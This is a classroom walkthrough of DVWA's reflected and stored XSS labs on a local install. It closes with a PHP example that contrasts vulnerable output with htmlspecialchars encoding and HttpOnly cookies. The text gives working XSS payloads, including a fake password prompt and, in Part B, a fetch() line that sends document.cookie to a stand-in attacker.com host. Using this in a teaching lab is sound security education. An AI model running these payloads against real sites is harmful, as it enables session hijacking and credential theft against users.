XSS = Cross-Site Scripting using DVWA
It allows an attacker to inject JavaScript into a web page so that it runs in another user’s browser.
DVWA has two XSS labs:
- Reflected XSS
- Stored XSS
We’ll do both step-by-step so you can demonstrate in class.
1. Setup DVWA
Open:
http://localhost/dvwa
Login → go to DVWA Security
Set:
Security level = Low
PART A — Reflected XSS
Go to:
DVWA → XSS (Reflected)
You’ll see:
Enter your name:
This page reflects input directly into HTML without sanitizing.
Basic XSS test
Enter:
<script>alert('XSS')</script>
Click submit.
You’ll see:
alert popup
Explain to students:
The website printed our script directly into the page, so the browser executed it.
Steal cookie demo
Enter:
<script>alert(document.cookie)</script>
It shows the session cookie.
Explain:
If an attacker gets this cookie → they can hijack the login session.
Fake login popup (impact demo)
<script>
var p = prompt("Enter password");
alert("Password captured: " + p);
</script>
Shows how attackers trick users.
Why it worked
Backend prints input like:
echo "Hello " . $_GET['name'];
No filtering → script executes.
PART B — Stored XSS
Go to:
DVWA → XSS (Stored)
This is more dangerous.
It stores the script in the database, and the script runs for every user who views the page.
Attack
In message field enter:
<script>alert('Stored XSS')</script>
Submit.
Now refresh page → popup appears automatically.
Explain:
Script is saved in database.
Every visitor gets attacked.
Cookie stealing example
Enter:
<script>
fetch("http://attacker.com/steal?c="+document.cookie);
</script>
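The fix for the "Why it worked" echo in Part A and for the stored case in Part B is to encode input at output time. This is an added example, not DVWA's own source or part of the original lab; the function names and sample rows are hypothetical, and the payload strings are the ones entered above.

```php
<?php
// Added example, not DVWA's own source. Function names and sample rows are
// hypothetical; the payload strings are the ones entered in the labs above.

// Keeps document.cookie from exposing the session ID if an injection is missed.
// Must run before any output (the array form needs PHP 7.3+).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);

// HTML-body encoding: <, >, &, " and ' become entities, so the browser
// displays the text instead of parsing it as markup.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Reflected case, vulnerable: same pattern as echo "Hello " . $_GET['name'];
function greet_vulnerable(string $name): string
{
    return 'Hello ' . $name;
}

// Reflected case, hardened: encode at the point of output.
function greet_hardened(string $name): string
{
    return 'Hello ' . h($name);
}

// Stored case, hardened: rows come back from the database unchanged and
// are encoded every time they are rendered.
function render_guestbook(array $rows): string
{
    $out = '';
    foreach ($rows as $row) {
        $out .= '<div>Name: ' . h($row['name'])
              . '<br>Message: ' . h($row['message']) . "</div>\n";
    }
    return $out;
}

// Constructed sample input.
$name = "<script>alert('XSS')</script>";
$rows = [['name' => 'student', 'message' => "<script>alert('Stored XSS')</script>"]];

echo greet_vulnerable($name), "\n"; // script tag reaches the page intact
echo greet_hardened($name), "\n";   // same input, rendered as visible text
echo render_guestbook($rows);       // stored payload is encoded on every view
```

Run it with the PHP CLI and compare the first two output lines: the vulnerable one still contains a live script tag, the hardened one contains only entities.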